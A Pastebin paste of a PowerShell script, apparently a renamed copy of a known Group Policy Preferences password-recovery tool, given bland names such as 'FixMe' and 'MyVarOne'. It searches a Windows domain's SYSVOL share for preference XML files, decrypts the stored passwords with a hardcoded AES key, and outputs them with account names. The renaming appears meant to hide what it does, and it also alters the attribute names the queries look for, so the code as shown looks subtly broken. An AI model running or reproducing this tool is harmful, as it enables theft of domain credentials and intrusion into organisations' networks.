Advertisement
Guest User

Untitled

a guest
Feb 21st, 2018
63
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.40 KB | None | 0 0
  1. function FixMe {
  2. [CmdletBinding()]
  3. Param (
  4. [ValidateNotNullOrEmpty()]
  5. [String]
  6. $Server = $Env:USERDNSDOMAIN
  7. )
  8.  
  9. Set-StrictMode -Version 2
  10.  
  11. function Get-DecryptedMyVarOne {
  12. [CmdletBinding()]
  13. Param (
  14. [string] $MyVarOne
  15. )
  16.  
  17. try {
  18. $Mod = ($MyVarOne.length % 4)
  19.  
  20. switch ($Mod) {
  21. '1' {$MyVarOne = $MyVarOne.Substring(0,$MyVarOne.Length -1)}
  22. '2' {$MyVarOne += ('=' * (4 - $Mod))}
  23. '3' {$MyVarOne += ('=' * (4 - $Mod))}
  24. }
  25.  
  26. $Base64Decoded = [Convert]::FromBase64String($MyVarOne)
  27.  
  28. $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
  29. [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
  30. 0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
  31.  
  32. $AesIV = New-Object Byte[]($AesObject.IV.Length)
  33. $AesObject.IV = $AesIV
  34. $AesObject.Key = $AesKey
  35. $DecryptorObject = $AesObject.CreateDecryptor()
  36. [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
  37.  
  38. return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
  39. }
  40.  
  41. catch {Write-Error $Error[0]}
  42. }
  43.  
  44. function FixMeInternal {
  45. [CmdletBinding()]
  46. Param (
  47. $File
  48. )
  49.  
  50. try {
  51.  
  52. $Filename = Split-Path $File -Leaf
  53. [xml] $Xml = Get-Content ($File)
  54.  
  55. $MyVarOne = @()
  56. $UserName = @()
  57. $NewName = @()
  58. $Changed = @()
  59. $Password = @()
  60.  
  61. if ($Xml.innerxml -like "*MyVarOne*"){
  62.  
  63. Write-Verbose "Potential password in $File"
  64.  
  65. switch ($Filename) {
  66.  
  67. 'Groups.xml' {
  68. $MyVarOne += , $Xml | Select-Xml "/Groups/User/Properties/@MyVarOne" | Select-Object -Expand Node | ForEach-Object {$_.Value}
  69. $UserName += , $Xml | Select-Xml "/Groups/User/Properties/@userName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
  70. $NewName += , $Xml | Select-Xml "/Groups/User/Properties/@newName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
  71. $Changed += , $Xml | Select-Xml "/Groups/User/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
  72. }
  73.  
  74. 'Services.xml' {
  75. $MyVarOne += , $Xml | Select-Xml "/NTServices/NTService/Properties/@MyVarOne" | Select-Object -Expand Node | ForEach-Object {$_.Value}
  76. $UserName += , $Xml | Select-Xml "/NTServices/NTService/Properties/@accountName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
  77. $Changed += , $Xml | Select-Xml "/NTServices/NTService/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
  78. }
  79.  
  80. 'Scheduledtasks.xml' {
  81. $MyVarOne += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@MyVarOne" | Select-Object -Expand Node | ForEach-Object {$_.Value}
  82. $UserName += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@runAs" | Select-Object -Expand Node | ForEach-Object {$_.Value}
  83. $Changed += , $Xml | Select-Xml "/ScheduledTasks/Task/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
  84. }
  85.  
  86. 'DataSources.xml' {
  87. $MyVarOne += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@MyVarOne" | Select-Object -Expand Node | ForEach-Object {$_.Value}
  88. $UserName += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
  89. $Changed += , $Xml | Select-Xml "/DataSources/DataSource/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
  90. }
  91.  
  92. 'Printers.xml' {
  93. $MyVarOne += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@MyVarOne" | Select-Object -Expand Node | ForEach-Object {$_.Value}
  94. $UserName += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
  95. $Changed += , $Xml | Select-Xml "/Printers/SharedPrinter/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
  96. }
  97.  
  98. 'Drives.xml' {
  99. $MyVarOne += , $Xml | Select-Xml "/Drives/Drive/Properties/@MyVarOne" | Select-Object -Expand Node | ForEach-Object {$_.Value}
  100. $UserName += , $Xml | Select-Xml "/Drives/Drive/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
  101. $Changed += , $Xml | Select-Xml "/Drives/Drive/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
  102. }
  103. }
  104. }
  105.  
  106. foreach ($Pass in $MyVarOne) {
  107. Write-Verbose "Decrypting $Pass"
  108. $DecryptedPassword = Get-DecryptedMyVarOne $Pass
  109. Write-Verbose "Decrypted a password of $DecryptedPassword"
  110. $Password += , $DecryptedPassword
  111. }
  112.  
  113. if (!($Password)) {$Password = '[BLANK]'}
  114. if (!($UserName)) {$UserName = '[BLANK]'}
  115. if (!($Changed)) {$Changed = '[BLANK]'}
  116. if (!($NewName)) {$NewName = '[BLANK]'}
  117.  
  118. $ObjectProperties = @{'Passwords' = $Password;
  119. 'UserNames' = $UserName;
  120. 'Changed' = $Changed;
  121. 'NewName' = $NewName;
  122. 'File' = $File}
  123.  
  124. $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties
  125. Write-Verbose "The password is between {} and may be more than one value."
  126. if ($ResultsObject) {Return $ResultsObject}
  127. }
  128.  
  129. catch {Write-Error $Error[0]}
  130. }
  131.  
  132. try {
  133. if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) {
  134. throw 'Machine is not a domain member or User is not a member of the domain.'
  135. }
  136.  
  137. Write-Verbose "Searching \\$Server\SYSVOL. This could take a while."
  138. $XMlFiles = Get-ChildItem -Path "\\$Server\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml'
  139.  
  140. if ( -not $XMlFiles ) {throw 'No preference files found.'}
  141.  
  142. Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords."
  143.  
  144. foreach ($File in $XMLFiles) {
  145. $Result = (FixMeInternal $File.Fullname)
  146. Write-Output $Result
  147. }
  148. }
  149.  
  150. catch {Write-Error $Error[0]}
  151. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement